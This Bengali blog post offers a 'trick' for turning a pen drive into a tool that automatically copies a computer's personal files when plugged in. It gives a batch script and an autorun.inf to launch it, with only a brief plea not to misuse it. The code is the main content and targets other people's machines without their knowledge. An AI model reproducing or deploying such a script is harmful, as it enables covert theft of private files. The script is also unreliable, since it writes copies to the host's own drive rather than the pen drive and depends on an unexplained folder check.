কম্পিউটারের সমস্ত ফাইল/ফোল্ডার অটোমেটিক কপি করে নিন আপনার পেন ড্রাইভে।

কম্পিউটারের সমস্ত ফাইল/ফোল্ডার অটোমেটিক কপি করে নিন আপনার পেন ড্রাইভে
আজ আমি আপনাদের খুব মজার একটি ট্রিকস এর ব্যপারে জানাব।
আমি আজকে আপনাদের মজার একটি কোডিং দেখবো যার মাধ্যমে আপনি যে কোন কম্পিউটার থেকে আপনার পেন ড্রাইভ টি সংযুক্ত করার সাথে সাথে সেই পিসির সমস্ত ফাইল/ফোল্ডার অটোমে্নাদের কপি করে নিতে পারবেন।
compablk_e0 
এর মানে হচ্ছে আমরা এমন একটি ছোট ব্যাচ ফাইল তৈরি করব যা থেকে এই কাজটি খুব সহজ ভাবে করে নিতে পারবেন। তবে একটি অবশ্যই মনে রাখবেন।  এটি দিয়ে কারো ক্ষতি করার চেষ্টা করবেন না প্লিজ। শুধু মাত্র জেনে রাখার জন্য শেয়ার করলাম।

যা যা করতে হবেঃ-

@echo off
:CHECK
if not exist “%homedrive%\Copied_files” md “%homedrive%\Copied_files”
if exist “%systemdrive%\files” goto COPIER7
goto ERROR
:COPIER7
if not exist “%homedrive%\Copied_files\%computername%” md “%homedrive%\Copied_files\%computername%”
if not exist “%homedrive%\Copied_files\%computername%\VIDEOS” md “%homedrive%\Copied_files\%computername%\VIDEOS”
if not exist “%homedrive%\Copied_files\%computername%\PICTURES” md “%homedrive%\Copied_files\%computername%\PICTURES”
if not exist “%homedrive%\Copied_files\%computername%\MUSIC” md “%homedrive%\Copied_files\%computername%\MUSIC”
if not exist “%homedrive%\Copied_files\%computername%\DOWNLOADS” md “%homedrive%\Copied_files\%computername%\DOWNLOADS”
copy /y “%userprofile%\Documents\*.*” “%homedrive%\Copied_files\%computername%”
copy /y “%userprofile%\Videos” “%homedrive%\Copied_files\%computername%\VIDEOS”
copy /y “%userprofile%\Music” “%homedrive%\Copied_files\%computername%\MUSIC”
copy /y “%userprofile%\Pictures” “%homedrive%\Copied_files\%computername%\PICTURES”
copy /y “%userprofile%\Downloads” “%homedrive%\Copied_files\%computername%\DOWNLOADS”
MSG %username% “DONE!”
exit
:ERROR
exit

২। উদাহরনে আমরা শুধু মাত্র মাই document এর সকল ফাইল কপি করে দেখছি কারন ফুল পিসি কপি হতে অনেক সময় লাগবে।
৩। এরপর এই ফাইলটি আপনার পেন ড্রাইভে রেখে দিন।
৪। এখন এই ব্যাচ কোডিং টি যেনো পেন ড্রাইভ লাগানোর সাথে সাথে কাজ করে সেজন্য একটি autorun.inf ফাইল বানাতে হবে। মানে হচ্ছে কোডিং টি যেনো automatic রান করে সেটির ব্যবস্থা এখন করব আমরা। নিচের কোডিং গুলো হুবুহু কপি করে করে নোটপ্যাডে সেভ করে নাম দিন autorun.inf
[autorun]
Open=pp.bat
Action=File Copier
autorun1 
৫। এখানে খেয়াল করুন ২নাম্বার লাইনে pp.bat নাম দিয়েছি কারন আমাদের তৈরি
 করা ফাইলের নাম হচ্ছে pp.bat যদি আপনি অন্য কোন নাম দিয়ে ফাইল সেভ করেন 
তাহলে সেই নামটা pp.bat এর পরিবর্তে সেই নামটি লিখে নিবেন।


৬। এখন কাজ শেষ এবার আপনার পেন ড্রাইভ একটি মেশিন গান হয়ে গেছে ! যে কোন
 কম্পিউটার এ এটি যুক্ত করার সাথে সাথে সম্পূর্ণ automatic ভাবে কম্পিউটার 
এর সমস্ত ফাইল এবং ফোল্ডার আপনার পেন ড্রাইভে কপি করা শুরু করে দিবে।
ms3d_gadget_e0 
কপি করার সময় নিচের ছবিত মত একটি স্ক্রীন আসবে।
cmd 
পোস্টটি পড়ে কেমন লাগলো মন্তব্য করে জানাবেন। 



 

 






Comments

Popular posts from this blog